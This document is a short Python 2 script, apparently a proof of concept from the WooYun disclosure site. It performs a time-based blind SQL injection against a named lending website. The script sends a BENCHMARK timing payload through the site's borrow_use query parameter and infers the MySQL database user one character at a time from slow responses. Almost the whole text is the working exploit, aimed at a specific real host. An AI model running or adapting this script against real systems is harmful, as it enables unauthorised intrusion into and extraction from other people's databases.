WooYun.org

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
headers = {'Content-Type': 'application/x-www-form-urlencoded',}
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 15):
    for payload in payloads:
        
        #time.sleep(5)
        
        s = "') and 'aa' like if((mid(user()from(%s)for(1))) like '%%%s%%',BENCHMARK(6000000,encode(\"hello\",\"goodbye\")),'a') -- " % (i, (payload))
        s = "/full/index.html?account_status=&borrow_area_city=&borrow_interestrate=2&borrow_type=&borrow_use="+urllib.quote(s)+"&hasinvest=&keywords=&order=&spread_month=10"
        conn = httplib.HTTPConnection('lbydai.com', timeout=100)
        conn.request(method='POST', url=s, headers=headers)
        start_time = time.time()
        html_doc = conn.getresponse().read()
        conn.close()
        print '.',
        print time.time() - start_time
        
        if time.time() - start_time > 7.7:
            user += payload
            print '\n[in progress]', user,
            break
        
print '\n[Done] MySQL user is %s' % user